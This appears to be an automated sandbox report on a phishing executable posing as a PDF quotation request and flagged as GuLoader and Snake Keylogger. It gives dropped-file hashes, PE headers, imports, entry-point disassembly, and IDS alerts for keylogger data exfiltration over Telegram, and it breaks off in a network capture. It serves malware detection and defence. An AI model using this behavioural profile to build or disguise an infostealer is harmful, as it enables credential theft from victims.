                                                                                                                            Certificado FNMT-RCM.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                              Produccion.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                Process:C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):297598
                                                                                                                                Entropy (8bit):7.688657224637642
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6144:FAm56jogmL+f52bCMfopSlgiyrhHwK2bLk+WcNwdTmh8gsqSCOT3tR7LNNkuT3e:J5dL+89fwSq9r1wK2/qdTma5qSxztR76
                                                                                                                                MD5:2A7FEAD07C1AB1898ACFC34F55C542A6
                                                                                                                                SHA1:79D3C402330822C990B19919E629A8C1F80951F7
                                                                                                                                SHA-256:BDCE79AB6D8A2F41C5DDCA01ED92967A649940D7DF3B129F7FF8F9106724D142
                                                                                                                                SHA-512:CC84083F1220094A45C5D6A481F4C5827906E0CA956CB4733340A7EA4215857746AE3F93F7775D8B9FE5A63C107DC7922E1CF99F2D7D773051F4775047052A71
                                                                                                                                Malicious:false
                                                                                                                                Reputation:low
                                                                                                                                Preview:...........k.........^...................!!.||||...-..m....yy...M..DD.............................h.f.H.....................W.....hhhhh..........].........................w......(...........|.....................666..!!!!........................[[....g........~~~......................R......``.nn..w.............KK.222......55..........Y..........-.................VV.[.dd...BBB.....nn...OO........{.x...**.'................S...{..........#........x....+.........%.....,,,....""....i...KK..............\....p.....................OOO..............................B.................h................S..nnnn.....---..*..7....O..........uu.ff.......................................+++.........................................................................................UUUUU..c.......TT.............EE...DDDDDD....R........;;.......DD................].........................)..........DD...++..WW..............u....jj...uuuu.v.........h..H.{.........l.p.............rrr.M..........gg.M............
                                                                                                                                Process:C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):98603
                                                                                                                                Entropy (8bit):4.616163373193616
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3072:K3dgAwxhCxiMHamvPqqCVRaxFUwE/YseaV:OwnMiMHrvhEaI/YsJ
                                                                                                                                MD5:E91A98646F5BEC50D0ABD83EDE7CD6D2
                                                                                                                                SHA1:9854E69C818BB7289150470F8011AC56FF21BC72
                                                                                                                                SHA-256:18AAF1D535D7F02D79C4155621054CAC706C6D005992F9F344E2A453796F2C59
                                                                                                                                SHA-512:FAED0EB6046A33C74828CA8647EE9F35544E2BA2879202D5E9908354FA0A2E08182218B55A7E451D600AF6297D96A2E13F475A8E8E8B8658B775FFF5F3C80F75
                                                                                                                                Malicious:false
                                                                                                                                Reputation:low
                                                                                                                                Preview:..MM.....aaaa.....................g...T...x.}..................................y.$$$........^...........~~.pp.......M.........vvv..SS.............777.@@@..:........".....qqqq..........8....|.:::........................222.QQQQ.>.......h....)).........?......MMMMMM.!!!.............P.T............`...........................b.....[[[......................7.hhh.............@.....LLLLL......GG.....R.PPP.NNN.uu.....p....................,...................................................7.~.............................S....hh.R.f.p...000....................66.jjjj....................uuuu....33..g........Y.j..//..s..Y...................=...HHHHHH..bb.6....ZZZ.........:...........q.d.]]]]...f....++.!!.99...........1111.........=.LLL.nnnn.....N................d.WWW.l.............***........%%%...(...=.....yy.DD.MM...........==..........................%%%. .............kkk.............""".........p....nnn..zz..........o.D....d...V......;;;...........^.b.........................c..............
                                                                                                                                Process:C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):56641
                                                                                                                                Entropy (8bit):1.2318917163845036
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:vrBeaW6xu5Pd9GW0Zq+/HXF1qcGNMUd8phxiFQHOV7hpvZlq:t9+Pdop/306xixrlq
                                                                                                                                MD5:39C9A5F767D8C170B5CE38EA8D5734D4
                                                                                                                                SHA1:4B4CA81EB3D093645B504004F62A269D4EACDECC
                                                                                                                                SHA-256:87A7017021050071DBE5726BF9AC505763CD923E2BDE93336CA0905802CD8D49
                                                                                                                                SHA-512:AE2D66B801251046FA4D3093391B916955B43BE75A954DD398583B1B8881A9F109F51F81D6E4FE759F83AC7B921FA89B02185013AFDE16D3C8EAB422BE89B4FF
                                                                                                                                Malicious:false
                                                                                                                                Reputation:low
                                                                                                                                Preview:.............l.........z........i........8.........................m.........f.C.Z..............I./........T..1.......................!......................D.................................................................................U................................../........................................-.......................}.........T`.....0@.............................F..............................].........................L.........<.........................................................................................N......................................................x........................................................@............................................4..........'...................?..........I.............../....................L....,...............................................;......k.....................................i............4.......................................K.....7...7....c...................U..#..............................
                                                                                                                                Process:C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
                                                                                                                                File Type:ASCII text, with very long lines (345), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):345
                                                                                                                                Entropy (8bit):4.241929841155785
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:dvkdMOL4xnuXGNQWjMIDw1luhPB46xAJX7sBJOdkmLA8gMfArpIXbgOwQWiQJEEC:dufExIoDe1lYnGJLsBQdtL6rpIrWQkJA
                                                                                                                                MD5:AE69FE0F4D1E1115BC470031E661785C
                                                                                                                                SHA1:8D3799826FE457C61C1E8EE5E3071683A8125BC5
                                                                                                                                SHA-256:6B18768503395C809263568D3A8858810404C2B7D49DC7CB6CE5F717F5D6C7DE
                                                                                                                                SHA-512:969C0DB048EAC4A9B447A0C0C463A7983F1B4091B6206E274B9D249F8311439B6C33F5AA1EDF9CD1AA27502DA49378D3E1B45F16909C55DF830E51684E9648BE
                                                                                                                                Malicious:false
                                                                                                                                Reputation:low
                                                                                                                                Preview:pandas omflakkendes tribrachic miskenning.nonvitally subcase syvendelens weighin.tilhreres lysed metencephalons aabentstaaendes arbejdsmarkedsstyrelsers.kodeskrifter indgaaet nstnederst desulphurise badevgtene caliche.reabsorption erhvervskommunernes aktuarerne ammunition whilere sughs.tusindaarigt barkers landholders butylation phrenicocolic.
                                                                                                                                Process:C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
                                                                                                                                File Type:Matlab v4 mat-file (little endian) ', numeric, rows 63, columns 0
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):210366
                                                                                                                                Entropy (8bit):1.240975322465592
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:vBTwJOLxCIF0V6iLboHog6BQlsMqlN1R0pmGy30wbfq6+9GmlsNh34k0uJ/QohER:cJigyyDJnLH7zA
                                                                                                                                MD5:AEF78D8D561E8802286A78AAC6C73ED6
                                                                                                                                SHA1:DDF5DA649482D0A553802827BB9F0EF64A7069E1
                                                                                                                                SHA-256:45F24543C01C9A11CC2246A9B27569AF433EEF61C877A4E191B683315D3566BE
                                                                                                                                SHA-512:93D43C0CECADF8E1F507F8E58D2B4D92995D8F7ECF213A23559938B380033A6D0D80B0816A8D6603864F821F4FEDC988E0F79BE14C6892089178970E08DC4199
                                                                                                                                Malicious:false
                                                                                                                                Reputation:low
                                                                                                                                Preview:....?...........*=..'...........................m........................y............................................................................H.......................................c.......x........................................................:...s.......................+.........................................~.....2........C..Z...................................k............................i.........................................{...............................................?%............................................................................Z................................v.............<.....'.............L..........................................+...............................s.........................................W........................`........................[..............&..................T................................j......M......[.....................c.............................................9.......................................
                                                                                                                                Process:C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):363811
                                                                                                                                Entropy (8bit):1.2512349423386382
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:y2f405GRYtnSLOBbyCociR2TVuEpHsVURGxwGmXjyMB+CtKDOgt9rlHF1QOs+9m5:pIuagbnK7CwVwFpYogwhUsvCq
                                                                                                                                MD5:BFEA15C03AB295424981A73637A19491
                                                                                                                                SHA1:A5ADABDDC373D6B3004F96946D84B651E42D9F5C
                                                                                                                                SHA-256:83E9CE74259889DCABD39D41131F286882B224698DCDEB8D0B4074069AAA687B
                                                                                                                                SHA-512:CB5969BFFAED8AF1791938E924E0CC9F876E45165F4E7EA5E9249131FACA831C0600F14BD68EF041D18C81A3FBE087970043D1B3B8A6786C1E5E5049834D4D0D
                                                                                                                                Malicious:false
                                                                                                                                Preview:...................................................E....................................j.A..(.......................................+..........................$.............................................z.L........%......t...................................2l.............1.............................................................................U...g.......................`............................................................0..................................J......................................K...R...............................................................&...c......................................S......!...8..................Y......................................................>u........T...................L........................................................................0.........................................W.....L.n.....................................$.b...........B..................................................8...............!...............
                                                                                                                                Process:C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):11776
                                                                                                                                Entropy (8bit):5.655335921632966
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:eF24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35Ol9Sl:h8QIl975eXqlWBrz7YLOl9
                                                                                                                                MD5:EE260C45E97B62A5E42F17460D406068
                                                                                                                                SHA1:DF35F6300A03C4D3D3BD69752574426296B78695
                                                                                                                                SHA-256:E94A1F7BCD7E0D532B660D0AF468EB3321536C3EFDCA265E61F9EC174B1AEF27
                                                                                                                                SHA-512:A98F350D17C9057F33E5847462A87D59CBF2AAEDA7F6299B0D49BB455E484CE4660C12D2EB8C4A0D21DF523E729222BBD6C820BF25B081BC7478152515B414B3
                                                                                                                                Malicious:false
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                Joe Sandbox View:
                                                                                                                                • Filename: SWIFT09181-24_pdf.exe, Detection: malicious, Browse
                                                                                                                                • Filename: O0rhQM49FL.exe, Detection: malicious, Browse
                                                                                                                                • Filename: O0rhQM49FL.exe, Detection: malicious, Browse
                                                                                                                                • Filename: 5WP9WCM8qV.exe, Detection: malicious, Browse
                                                                                                                                • Filename: 5WP9WCM8qV.exe, Detection: malicious, Browse
                                                                                                                                • Filename: K8ZvbdkrGx.exe, Detection: malicious, Browse
                                                                                                                                • Filename: K8ZvbdkrGx.exe, Detection: malicious, Browse
                                                                                                                                • Filename: JOSXXL1.exe, Detection: malicious, Browse
                                                                                                                                • Filename: Certificado FNMT-RCM.exe, Detection: malicious, Browse
                                                                                                                                • Filename: Produccion.exe, Detection: malicious, Browse
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L...]..V...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
                                                                                                                                File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1162
                                                                                                                                Entropy (8bit):3.26185238901619
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:8wl0+sXU1e/tz0/CSL6/cBnwgXl341DEDeG41DEDlzQ1olfW+kjcmAahCNfBf4tK:8FvWLrFPjPqizZMAjqy
                                                                                                                                MD5:ADDA4886016C22818D8CC39FCA9522C8
                                                                                                                                SHA1:63B94BD19B425DFB90BF6309C2E9089A41613CA4
                                                                                                                                SHA-256:1697857E3EC84DBAAEA743E4B70BC1ACF89F244E277C21956A656BEB92CB9D7B
                                                                                                                                SHA-512:1CF1E5203452D11883F21EB5771C11BDFEF3207407AC78CED3F8AB0239C032D6C3F230ADEFD751E09CDE2DA8958FB2ED35D40EE89778F22A56CF22BD43F208E9
                                                                                                                                Malicious:false
                                                                                                                                Preview:L..................F........................................................q....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................a.l.f.o.n.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....b.1...........mindevrdigt.H............................................m.i.n.d.e.v.r.d.i.g.t.......2...........boghandlermedhjlperens.tor..f............................................b.o.g.h.a.n.d.l.e.r.m.e.d.h.j.l.p.e.r.e.n.s...t.o.r...*.../.....\.....\.....\.m.i.n.d.e.v.r.d.i.g.t.\.b.o.g.h.a.n.d.l.e.r.m.e.d.h.j.l.p.e.r.e.n.s...t.o.r.P.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.I.N.e.t.C.a.c.h.e.\.r.a.p.i.d.i.t.e.t.e.n.s.\.f.r.e.m.t.v.i.n.g.............}.............>.e.L.:..er.
                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                Entropy (8bit):7.962503274476573
                                                                                                                                TrID:
                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                File name:REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
                                                                                                                                File size:475'776 bytes
                                                                                                                                MD5:fd9335d7160883534e42839297a65c7d
                                                                                                                                SHA1:80cd18a77f7896e06adc5bb4eb544e6c7e5bad5d
                                                                                                                                SHA256:7fccb9545a51bb6d40e9c78bf9bc51dc2d2a78a27b81bf1c077eaf405cbba6e9
                                                                                                                                SHA512:18661ad7313f2d366083ac000e48e86bb8c5ec889494ade7488ef7dc81a97adc867753100517d5d86a2e76b283672e1c958811d7f0ffa735388aa88a1cd7dda8
                                                                                                                                SSDEEP:12288:I5AzzWpSFt+rLm8vGaQ/Zwu7Jj1JK8s5FEeKW:ZzzMSFOLmQGaQ/Zwu7Jj1Jicev
                                                                                                                                TLSH:12A42312A270D053F175073B0C127AEEB53AB325AA304A5757983FA93D32791D52BEAC
                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..NP..*_...P...s...P...V...P..Rich.P..........................PE..L......V.................d.........
                                                                                                                                Icon Hash:3d2e0f95332b3399
                                                                                                                                Entrypoint:0x4032a0
                                                                                                                                Entrypoint Section:.text
                                                                                                                                Digitally signed:false
                                                                                                                                Imagebase:0x400000
                                                                                                                                Subsystem:windows gui
                                                                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                Time Stamp:0x567F847F [Sun Dec 27 06:26:07 2015 UTC]
                                                                                                                                TLS Callbacks:
                                                                                                                                CLR (.Net) Version:
                                                                                                                                OS Version Major:4
                                                                                                                                OS Version Minor:0
                                                                                                                                File Version Major:4
                                                                                                                                File Version Minor:0
                                                                                                                                Subsystem Version Major:4
                                                                                                                                Subsystem Version Minor:0
                                                                                                                                Import Hash:d4b94e8ee3f620a89d114b9da4b31873
                                                                                                                                Instruction
                                                                                                                                sub esp, 000002D4h
                                                                                                                                push ebp
                                                                                                                                push esi
                                                                                                                                push 00000020h
                                                                                                                                xor ebp, ebp
                                                                                                                                pop esi
                                                                                                                                mov dword ptr [esp+0Ch], ebp
                                                                                                                                push 00008001h
                                                                                                                                mov dword ptr [esp+0Ch], 0040A300h
                                                                                                                                mov dword ptr [esp+18h], ebp
                                                                                                                                call dword ptr [004080B0h]
                                                                                                                                call dword ptr [004080ACh]
                                                                                                                                cmp ax, 00000006h
                                                                                                                                je 00007FF460AE1BF3h
                                                                                                                                push ebp
                                                                                                                                call 00007FF460AE4D36h
                                                                                                                                cmp eax, ebp
                                                                                                                                je 00007FF460AE1BE9h
                                                                                                                                push 00000C00h
                                                                                                                                call eax
                                                                                                                                push ebx
                                                                                                                                push edi
                                                                                                                                push 0040A2F4h
                                                                                                                                call 00007FF460AE4CB3h
                                                                                                                                push 0040A2ECh
                                                                                                                                call 00007FF460AE4CA9h
                                                                                                                                push 0040A2E0h
                                                                                                                                call 00007FF460AE4C9Fh
                                                                                                                                push 00000009h
                                                                                                                                call 00007FF460AE4D04h
                                                                                                                                push 00000007h
                                                                                                                                call 00007FF460AE4CFDh
                                                                                                                                mov dword ptr [00434F04h], eax
                                                                                                                                call dword ptr [00408044h]
                                                                                                                                push ebp
                                                                                                                                call dword ptr [004082A8h]
                                                                                                                                mov dword ptr [00434FB8h], eax
                                                                                                                                push ebp
                                                                                                                                lea eax, dword ptr [esp+34h]
                                                                                                                                push 000002B4h
                                                                                                                                push eax
                                                                                                                                push ebp
                                                                                                                                push 0042B228h
                                                                                                                                call dword ptr [0040818Ch]
                                                                                                                                push 0040A2C8h
                                                                                                                                push 00433F00h
                                                                                                                                call 00007FF460AE48EAh
                                                                                                                                call dword ptr [004080A8h]
                                                                                                                                mov ebx, 0043F000h
                                                                                                                                push eax
                                                                                                                                push ebx
                                                                                                                                call 00007FF460AE48D8h
                                                                                                                                push ebp
                                                                                                                                call dword ptr [00408178h]
                                                                                                                                Programming Language:
                                                                                                                                • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x85c80xa0.rdata
                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x5d0000x11e0.rsrc
                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b8.rdata
                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                .text0x10000x637c0x640083ff228d6dae8dd738eb2f78afbc793fFalse0.672421875data6.491609540807675IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                .rdata0x80000x147c0x1600d9f9b0b330e238260616b62a7a3cac09False0.42933238636363635data4.973928345594701IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                .data0xa0000x2aff80x6003f2b05c8fbb8b2e4c9c89e93d30e7252False0.53125data4.133631086111171IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                .ndata0x350000x280000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                .rsrc0x5d0000x11e00x120020639f4e7c421f5379e2fb9ea4a1530dFalse0.3684895833333333data4.485045860065118IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                RT_BITMAP0x5d2680x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                                                                                                                RT_ICON0x5d5d00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.42473118279569894
                                                                                                                                RT_DIALOG0x5d8b80x144dataEnglishUnited States0.5216049382716049
                                                                                                                                RT_DIALOG0x5da000x13cdataEnglishUnited States0.5506329113924051
                                                                                                                                RT_DIALOG0x5db400x100dataEnglishUnited States0.5234375
                                                                                                                                RT_DIALOG0x5dc400x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                RT_DIALOG0x5dd600xc4dataEnglishUnited States0.5918367346938775
                                                                                                                                RT_DIALOG0x5de280x60dataEnglishUnited States0.7291666666666666
                                                                                                                                RT_GROUP_ICON0x5de880x14dataEnglishUnited States1.2
                                                                                                                                RT_MANIFEST0x5dea00x33fXML 1.0 document, ASCII text, with very long lines (831), with no line terminatorsEnglishUnited States0.5547533092659447
                                                                                                                                DLLImport
                                                                                                                                KERNEL32.dllSetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, MoveFileW, SetFileAttributesW, GetCurrentProcess, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, CompareFileTime, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, LoadLibraryW, GetProcAddress, GetModuleHandleA, ExpandEnvironmentStringsW, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, GlobalFree, lstrcmpW, GlobalAlloc, WaitForSingleObject, GlobalUnlock, GetDiskFreeSpaceW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                                                                                USER32.dllGetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, GetDC, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, LoadImageW, SetWindowLongW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, SetTimer, FindWindowExW, SendMessageTimeoutW, SetForegroundWindow
                                                                                                                                GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                                                SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                                                                                                                ADVAPI32.dllRegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                                                                COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                                                ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                EnglishUnited States
                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                2024-12-16T08:44:34.594664+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549790172.217.19.174443TCP
                                                                                                                                2024-12-16T08:44:42.104474+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549812158.101.44.24280TCP
                                                                                                                                2024-12-16T08:44:50.151400+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549812158.101.44.24280TCP
                                                                                                                                2024-12-16T08:44:52.642100+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.549837149.154.167.220443TCP
                                                                                                                                2024-12-16T08:44:54.198292+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549844158.101.44.24280TCP
                                                                                                                                2024-12-16T08:44:56.153699+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.549846149.154.167.220443TCP
                                                                                                                                2024-12-16T08:44:59.615943+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.549857149.154.167.220443TCP
                                                                                                                                2024-12-16T08:45:04.530721+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.549869149.154.167.220443TCP
                                                                                                                                2024-12-16T08:45:18.338618+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.549904149.154.167.220443TCP
                                                                                                                                2024-12-16T08:45:21.677927+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.549913149.154.167.220443TCP
                                                                                                                                2024-12-16T08:45:25.312878+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.549924149.154.167.220443TCP
                                                                                                                                2024-12-16T08:45:28.684774+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.549932149.154.167.220443TCP
                                                                                                                                2024-12-16T08:45:31.974564+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.549943149.154.167.220443TCP
                                                                                                                                2024-12-16T08:45:36.359279+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.549955149.154.167.220443TCP
                                                                                                                                2024-12-16T08:45:39.676339+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.549963149.154.167.220443TCP
                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                Dec 16, 2024 08:44:31.979274988 CET49790443192.168.2.5172.217.19.174
                                                                                                                                Dec 16, 2024 08:44:31.979334116 CET44349790172.217.19.174192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:31.979471922 CET49790443192.168.2.5172.217.19.174
                                                                                                                                Dec 16, 2024 08:44:31.990874052 CET49790443192.168.2.5172.217.19.174
                                                                                                                                Dec 16, 2024 08:44:31.990892887 CET44349790172.217.19.174192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:33.691505909 CET44349790172.217.19.174192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:33.691607952 CET49790443192.168.2.5172.217.19.174
                                                                                                                                Dec 16, 2024 08:44:33.692595005 CET44349790172.217.19.174192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:33.692692995 CET49790443192.168.2.5172.217.19.174
                                                                                                                                Dec 16, 2024 08:44:33.748830080 CET49790443192.168.2.5172.217.19.174
                                                                                                                                Dec 16, 2024 08:44:33.748878956 CET44349790172.217.19.174192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:33.749145985 CET44349790172.217.19.174192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:33.749212980 CET49790443192.168.2.5172.217.19.174
                                                                                                                                Dec 16, 2024 08:44:33.751698971 CET49790443192.168.2.5172.217.19.174
                                                                                                                                Dec 16, 2024 08:44:33.795348883 CET44349790172.217.19.174192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:34.594789028 CET44349790172.217.19.174192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:34.594904900 CET49790443192.168.2.5172.217.19.174
                                                                                                                                Dec 16, 2024 08:44:34.594940901 CET44349790172.217.19.174192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:34.594969034 CET44349790172.217.19.174192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:34.595021009 CET49790443192.168.2.5172.217.19.174
                                                                                                                                Dec 16, 2024 08:44:34.595053911 CET49790443192.168.2.5172.217.19.174
                                                                                                                                Dec 16, 2024 08:44:34.596072912 CET49790443192.168.2.5172.217.19.174
                                                                                                                                Dec 16, 2024 08:44:34.596105099 CET44349790172.217.19.174192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:34.755469084 CET49802443192.168.2.5142.250.181.1
